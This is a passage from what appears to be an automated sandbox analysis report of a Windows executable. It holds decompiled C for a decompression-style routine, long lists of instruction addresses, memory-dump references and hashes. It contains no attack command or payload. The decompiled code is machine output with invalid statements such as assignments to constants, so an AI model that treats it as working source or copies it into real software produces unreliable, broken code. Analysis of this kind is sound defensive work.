							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                        0x00000000
                        0x00406520
                        0x00406520
                        0x00406524
                        0x004065db
                        0x004065de
                        0x004065ea
                        0x004064cb
                        0x004064cb
                        0x004064ce
                        0x00406840
                        0x00406840
                        0x00406843
                        0x00406843
                        0x00406849
                        0x0040684f
                        0x00406855
                        0x0040686f
                        0x00406872
                        0x00406878
                        0x00406883
                        0x00406885
                        0x00406857
                        0x00406857
                        0x00406866
                        0x0040686a
                        0x0040686a
                        0x0040688f
                        0x004068b6
                        0x004068b6
                        0x004068bc
                        0x004068bc
                        0x00000000
                        0x00406891
                        0x00406891
                        0x00406895
                        0x00406a44
                        0x00000000
                        0x00406a44
                        0x004068a1
                        0x004068a8
                        0x004068b0
                        0x004068b3
                        0x00000000
                        0x004068b3
                        0x0040652a
                        0x0040652e
                        0x00406a6f
                        0x00406a6f
                        0x00406a72
                        0x00406a76
                        0x00406a76
                        0x00406534
                        0x0040653a
                        0x0040653d
                        0x00406541
                        0x00406544
                        0x00406548
                        0x00406a0e
                        0x00406a5a
                        0x00406a62
                        0x00406a69
                        0x00406a6b
                        0x00000000
                        0x00406a6b
                        0x0040654e
                        0x00406551
                        0x00406557
                        0x00406559
                        0x00406559
                        0x0040655c
                        0x0040655f
                        0x00406562
                        0x00406565
                        0x00406568
                        0x0040656b
                        0x0040656c
                        0x0040656e
                        0x0040656e
                        0x0040656e
                        0x00406571
                        0x00406574
                        0x00406577
                        0x0040657a
                        0x0040657a
                        0x0040657d
                        0x0040657f
                        0x0040657f
                        0x00406582
                        0x00406582
                        0x00406582
                        0x00406058
                        0x00406058
                        0x00406061
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00000000
                        0x00406072
                        0x00000000
                        0x00000000
                        0x0040607b
                        0x0040607e
                        0x00406081
                        0x00406085
                        0x00000000
                        0x00000000
                        0x0040608b
                        0x0040608e
                        0x00406090
                        0x00406091
                        0x00406094
                        0x00406096
                        0x00406097
                        0x00406099
                        0x0040609c
                        0x004060a1
                        0x004060a6
                        0x004060af
                        0x004060c2
                        0x004060c5
                        0x004060d1
                        0x004060f9
                        0x004060fb
                        0x00406109
                        0x00406109
                        0x0040610d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004060fd
                        0x004060fd
                        0x00406100
                        0x00406101
                        0x00406101
                        0x00000000
                        0x004060fd
                        0x004060d7
                        0x004060dc
                        0x004060dc
                        0x004060e5
                        0x004060ed
                        0x004060f0
                        0x00000000
                        0x004060f6
                        0x004060f6
                        0x00000000
                        0x004060f6
                        0x00000000
                        0x00406113
                        0x00406113
                        0x00406117
                        0x004069c3
                        0x00000000
                        0x004069c3
                        0x00406120
                        0x00406130
                        0x00406133
                        0x00406136
                        0x00406136
                        0x00406136
                        0x00406139
                        0x0040613d
                        0x00000000
                        0x00000000
                        0x0040613f
                        0x00406145
                        0x0040616f
                        0x00406175
                        0x0040617c
                        0x00000000
                        0x0040617c
                        0x0040614b
                        0x0040614e
                        0x00406153
                        0x00406153
                        0x0040615e
                        0x00406166
                        0x00406169
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061ae
                        0x004061b4
                        0x004061b7
                        0x004061c4
                        0x004061cc
                        0x00000000
                        0x00000000
                        0x00406183
                        0x00406183
                        0x00406187
                        0x004069d2
                        0x00000000
                        0x004069d2
                        0x00406193
                        0x0040619e
                        0x0040619e
                        0x0040619e
                        0x004061a1
                        0x004061a4
                        0x004061a7
                        0x004061ac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061d4
                        0x004061d6
                        0x004061d9
                        0x0040624a
                        0x0040624d
                        0x00406250
                        0x00406257
                        0x00406261
                        0x00000000
                        0x00406261
                        0x004061db
                        0x004061df
                        0x004061e2
                        0x004061e4
                        0x004061e7
                        0x004061ea
                        0x004061ec
                        0x004061ef
                        0x004061f1
                        0x004061f6
                        0x004061f9
                        0x004061fc
                        0x00406200
                        0x00406207
                        0x0040620a
                        0x00406211
                        0x00406215
                        0x0040621d
                        0x0040621d
                        0x0040621d
                        0x00406217
                        0x00406217
                        0x00406217
                        0x0040620c
                        0x0040620c
                        0x0040620c
                        0x00406221
                        0x00406224
                        0x00406242
                        0x00406244
                        0x00000000
                        0x00406226
                        0x00406226
                        0x00406229
                        0x0040622c
                        0x0040622f
                        0x00406231
                        0x00406231
                        0x00406231
                        0x00406234
                        0x00406237
                        0x00406239
                        0x0040623a
                        0x0040623d
                        0x00000000
                        0x0040623d
                        0x00000000
                        0x00406473
                        0x00406477
                        0x00406495
                        0x00406498
                        0x0040649f
                        0x004064a2
                        0x004064a5
                        0x004064a8
                        0x004064ab
                        0x004064ae
                        0x004064b0
                        0x004064b7
                        0x004064b8
                        0x004064ba
                        0x004064bd
                        0x004064c0
                        0x004064c3
                        0x004064c3
                        0x004064c8
                        0x00000000
                        0x004064c8
                        0x00406479
                        0x0040647c
                        0x0040647f
                        0x00406489
                        0x00000000
                        0x00000000
                        0x004064dd
                        0x004064e1
                        0x00406504
                        0x00406507
                        0x0040650a
                        0x00406514
                        0x004064e3
                        0x004064e3
                        0x004064e6
                        0x004064e9
                        0x004064ec
                        0x004064f9
                        0x004064fc
                        0x004064fc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406591
                        0x00406595
                        0x0040659c
                        0x0040659f
                        0x004065a2
                        0x004065ac
                        0x00000000
                        0x004065ac
                        0x00406597
                        0x00000000
                        0x00000000
                        0x004065b8
                        0x004065bc
                        0x004065c3
                        0x004065c6
                        0x004065c9
                        0x004065be
                        0x004065be
                        0x004065be
                        0x004065cc
                        0x004065cf
                        0x004065d2
                        0x004065d2
                        0x004065d5
                        0x004065d8
                        0x00000000
                        0x00000000
                        0x00406678
                        0x00406678
                        0x0040667c
                        0x00406a1a
                        0x00000000
                        0x00406a1a
                        0x00406682
                        0x00406685
                        0x00406688
                        0x0040668c
                        0x0040668f
                        0x00406695
                        0x00406697
                        0x00406697
                        0x00406697
                        0x0040669a
                        0x0040669d
                        0x00000000
                        0x00000000
                        0x0040626d
                        0x0040626d
                        0x00406271
                        0x004069de
                        0x00000000
                        0x004069de
                        0x00406277
                        0x0040627a
                        0x0040627d
                        0x00406281
                        0x00406284
                        0x0040628a
                        0x0040628c
                        0x0040628c
                        0x0040628c
                        0x0040628f
                        0x00406292
                        0x00406292
                        0x00406295
                        0x00406298
                        0x00000000
                        0x00000000
                        0x0040629e
                        0x004062a4
                        0x00000000
                        0x00000000
                        0x004062aa
                        0x004062aa
                        0x004062ae
                        0x004062b1
                        0x004062b4
                        0x004062b7
                        0x004062ba
                        0x004062bb
                        0x004062be
                        0x004062c0
                        0x004062c6
                        0x004062c9
                        0x004062cc
                        0x004062cf
                        0x004062d2
                        0x004062d5
                        0x004062d8
                        0x004062f4
                        0x004062f7
                        0x004062fa
                        0x004062fd
                        0x00406304
                        0x00406308
                        0x0040630a
                        0x0040630e
                        0x004062da
                        0x004062da
                        0x004062de
                        0x004062e6
                        0x004062eb
                        0x004062ed
                        0x004062ef
                        0x004062ef
                        0x00406311
                        0x00406318
                        0x0040631b
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406326
                        0x00406326
                        0x0040632a
                        0x004069ea
                        0x00000000
                        0x004069ea
                        0x00406330
                        0x00406333
                        0x00406336
                        0x0040633a
                        0x0040633d
                        0x00406343
                        0x00406345
                        0x00406345
                        0x00406345
                        0x00406348
                        0x0040634b
                        0x0040634b
                        0x0040634b
                        0x00406351
                        0x00000000
                        0x00000000
                        0x00406353
                        0x00406356
                        0x00406359
                        0x0040635c
                        0x0040635f
                        0x00406362
                        0x00406365
                        0x00406368
                        0x0040636b
                        0x0040636e
                        0x00406371
                        0x00406389
                        0x0040638c
                        0x0040638f
                        0x00406392
                        0x00406392
                        0x00406395
                        0x00406399
                        0x0040639b
                        0x00406373
                        0x00406373
                        0x0040637b
                        0x00406380
                        0x00406382
                        0x00406384
                        0x00406384
                        0x0040639e
                        0x004063a5
                        0x004063a8
                        0x00000000
                        0x004063aa
                        0x00000000
                        0x004063aa
                        0x004063a8
                        0x004063af
                        0x004063af
                        0x004063af
                        0x004063af
                        0x00000000
                        0x00000000
                        0x004063ea
                        0x004063ea
                        0x004063ee
                        0x004069f6
                        0x00000000
                        0x004069f6
                        0x004063f4
                        0x004063f7
                        0x004063fa
                        0x004063fe
                        0x00406401
                        0x00406407
                        0x00406409
                        0x00406409
                        0x00406409
                        0x0040640c
                        0x0040640f
                        0x0040640f
                        0x00406415
                        0x004063b3
                        0x004063b3
                        0x004063b6
                        0x00000000
                        0x004063b6
                        0x00406417
                        0x00406417
                        0x0040641a
                        0x0040641d
                        0x00406420
                        0x00406423
                        0x00406426
                        0x00406429
                        0x0040642c
                        0x0040642f
                        0x00406432
                        0x00406435
                        0x0040644d
                        0x00406450
                        0x00406453
                        0x00406456
                        0x00406456
                        0x00406459
                        0x0040645d
                        0x0040645f
                        0x00406437
                        0x00406437
                        0x0040643f
                        0x00406444
                        0x00406446
                        0x00406448
                        0x00406448
                        0x00406462
                        0x00406469
                        0x0040646c
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x004066fb
                        0x004066fb
                        0x004066ff
                        0x00406a26
                        0x00000000
                        0x00406a26
                        0x00406705
                        0x00406708
                        0x0040670b
                        0x0040670f
                        0x00406712
                        0x00406718
                        0x0040671a
                        0x0040671a
                        0x0040671a
                        0x0040671d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040680a
                        0x0040680e
                        0x00406830
                        0x00406833
                        0x0040683d
                        0x00000000
                        0x0040683d
                        0x00406810
                        0x00406813
                        0x00406817
                        0x0040681a
                        0x0040681a
                        0x0040681d
                        0x00000000
                        0x00000000
                        0x004068c7
                        0x004068cb
                        0x004068e9
                        0x004068e9
                        0x004068e9
                        0x004068f0
                        0x004068f7
                        0x004068fe
                        0x004068fe
                        0x00000000
                        0x004068fe
                        0x004068cd
                        0x004068d0
                        0x004068d3
                        0x004068d6
                        0x004068dd
                        0x00406821
                        0x00406821
                        0x00406824
                        0x00000000
                        0x00000000
                        0x004069b8
                        0x004069bb
                        0x00000000
                        0x00000000
                        0x004065f2
                        0x004065f4
                        0x004065fb
                        0x004065fc
                        0x004065fe
                        0x00406601
                        0x00000000
                        0x00000000
                        0x00406609
                        0x0040660c
                        0x0040660f
                        0x00406611
                        0x00406613
                        0x00406613
                        0x00406614
                        0x00406617
                        0x0040661e
                        0x00406621
                        0x0040662f
                        0x00000000
                        0x00000000
                        0x00406905
                        0x00406905
                        0x00406908
                        0x0040690f
                        0x00000000
                        0x00000000
                        0x00406914
                        0x00406914
                        0x00406918
                        0x00406a50
                        0x00000000
                        0x00406a50
                        0x0040691e
                        0x00406921
                        0x00406924
                        0x00406928
                        0x0040692b
                        0x00406931
                        0x00406933
                        0x00406933
                        0x00406933
                        0x00406936
                        0x00406939
                        0x00406939
                        0x00406939
                        0x00406939
                        0x0040693c
                        0x0040693c
                        0x00406940
                        0x004069a0
                        0x004069a3
                        0x004069a8
                        0x004069a9
                        0x004069ab
                        0x004069ad
                        0x004069b0
                        0x00000000
                        0x004069b0
                        0x00406942
                        0x00406948
                        0x0040694b
                        0x0040694e
                        0x00406951
                        0x00406954
                        0x00406957
                        0x0040695a
                        0x0040695d
                        0x00406960
                        0x00406963
                        0x0040697c
                        0x0040697f
                        0x00406982
                        0x00406985
                        0x00406989
                        0x0040698b
                        0x0040698b
                        0x0040698c
                        0x0040698f
                        0x00406965
                        0x00406965
                        0x0040696d
                        0x00406972
                        0x00406974
                        0x00406977
                        0x00406977
                        0x00406992
                        0x00406999
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x00406637
                        0x0040663a
                        0x00406670
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a3
                        0x004067a3
                        0x004067a6
                        0x004067a8
                        0x00406a32
                        0x00000000
                        0x00406a32
                        0x004067ae
                        0x004067b1
                        0x00000000
                        0x00000000
                        0x004067b7
                        0x004067bb
                        0x004067be
                        0x004067be
                        0x004067be
                        0x00000000
                        0x004067be
                        0x0040663c
                        0x0040663e
                        0x00406640
                        0x00406642
                        0x00406645
                        0x00406646
                        0x00406648
                        0x0040664a
                        0x0040664d
                        0x00406650
                        0x00406666
                        0x0040666b
                        0x004066a3
                        0x004066a3
                        0x004066a7
                        0x004066d3
                        0x004066d5
                        0x004066dc
                        0x004066df
                        0x004066e2
                        0x004066e2
                        0x004066e7
                        0x004066e7
                        0x004066e9
                        0x004066ec
                        0x004066f3
                        0x004066f6
                        0x00406723
                        0x00406723
                        0x00406726
                        0x00406729
                        0x0040679d
                        0x0040679d
                        0x0040679d
                        0x00000000
                        0x0040679d
                        0x0040672b
                        0x00406731
                        0x00406734
                        0x00406737
                        0x0040673a
                        0x0040673d
                        0x00406740
                        0x00406743
                        0x00406746
                        0x00406749
                        0x0040674c
                        0x00406765
                        0x00406767
                        0x0040676a
                        0x0040676b
                        0x0040676e
                        0x00406770
                        0x00406773
                        0x00406775
                        0x00406777
                        0x0040677a
                        0x0040677c
                        0x0040677f
                        0x00406783
                        0x00406785
                        0x00406785
                        0x00406786
                        0x00406789
                        0x0040678c
                        0x0040674e
                        0x0040674e
                        0x00406756
                        0x0040675b
                        0x0040675d
                        0x00406760
                        0x00406760
                        0x0040678f
                        0x00406796
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00000000
                        0x00406798
                        0x00000000
                        0x00406798
                        0x00406796
                        0x004066a9
                        0x004066ac
                        0x004066ae
                        0x004066b1
                        0x004066b4
                        0x004066b7
                        0x004066b9
                        0x004066bc
                        0x004066bf
                        0x004066bf
                        0x004066c2
                        0x004066c2
                        0x004066c5
                        0x004066cc
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x00000000
                        0x004066ce
                        0x00000000
                        0x004066ce
                        0x004066cc
                        0x00406652
                        0x00406655
                        0x00406657
                        0x0040665a
                        0x00000000
                        0x00000000
                        0x004063b9
                        0x004063b9
                        0x004063bd
                        0x00406a02
                        0x00000000
                        0x00406a02
                        0x004063c3
                        0x004063c6
                        0x004063c9
                        0x004063cc
                        0x004063cf
                        0x004063d2
                        0x004063d5
                        0x004063d7
                        0x004063da
                        0x004063dd
                        0x004063e0
                        0x004063e2
                        0x004063e2
                        0x004063e2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004067c1
                        0x004067c1
                        0x004067c1
                        0x004067c5
                        0x00000000
                        0x00000000
                        0x004067cb
                        0x004067ce
                        0x004067d1
                        0x004067d4
                        0x004067d6
                        0x004067d6
                        0x004067d6
                        0x004067d9
                        0x004067dc
                        0x004067df
                        0x004067e2
                        0x004067e5
                        0x004067e8
                        0x004067e9
                        0x004067eb
                        0x004067eb
                        0x004067eb
                        0x004067ee
                        0x004067f1
                        0x004067f4
                        0x004067f7
                        0x004067fa
                        0x004067fe
                        0x00406800
                        0x00406803
                        0x00000000
                        0x00406805
                        0x00000000
                        0x00406805
                        0x00406803
                        0x00406a38
                        0x00000000
                        0x00000000
                        0x00406067

                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                        • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                        • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                        • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
